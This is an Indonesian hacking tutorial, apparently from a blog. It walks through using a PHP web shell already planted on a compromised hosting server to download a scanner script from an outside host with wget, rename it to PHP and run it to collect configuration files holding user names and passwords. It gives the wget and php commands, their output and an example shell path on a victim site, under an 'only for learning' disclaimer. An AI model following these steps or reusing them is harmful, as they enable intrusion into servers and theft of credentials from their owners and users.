CATATAN : Saya tidak bertanggung jawab atas penyalah gunaan artikel ini, semuanya hanyalah untuk proses pembelajaran
Ok, tanpa basa-basi saya mulai saja.
Yang perlu di persiapkan :
1. Seperti biasa, komputer yang terkoneksi ke internet.
2. Shell atau website hasil injectan kita. ( saya anggap rekan-rekan sudah tau gimana cara mendapatkannya )
3. Source untuk Scan file-file configurasi yang memuat informasi user dan password. dapat di download di http://wawan.22web.net/download/sConfig.txt
4. Segelas Cofeemix dan Sebungkus Sampoerna Mild. heheh
Praktek :
1. Buka Shell atau website injectan anda, ( catatan : file ini harus di upload ke dalam server yang akan kita scan user nya )
Contoh :
http://www.xxxhosting.us/phpwebsite/images/javascript/wysiwyg/display.php
( sebelumnya saya sudah upload phpshell ke dalam server tersebut )
2. Download file sConfig.txt dari http://wawan.22web.net/download/sConfig.txt ( file ini bisa berada dimana saja dalam server target, tentunya dalam folder yang mempunyai permission terhadap user yang kita gunakan skarang )
wget http://wawan.22web.net/download/sConfig.txt
##########################################################
wget wawan.22web.net/download/sConfig.txt
--03:59:52-- http://wawan.22web.net/download/sConfig.txt
=> `sConfig.txt'
Resolving wawan.22web.net... done.
Connecting to wawan.22web.net[209.51.196.242]:80...
connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
0K .....
184.39 KB/s
03:59:52 (184.39 KB/s) - `sConfig.txt' saved [6042] #######################################################
Setelah sukses men-download file sConfig.txt, rename file tersebut menjadi sConfig.php ( source codenya dalam bentuk PHP )
3. Jalankan file tersebut,
php sConfig.php
######################################################
mv sConfig.txt sConfig.php
php sConfig.php
Content-type: text/html
X-Powered-By: PHP/4.3.10
SUMBER : YASIRMASTER.BLOGSPOT.COM
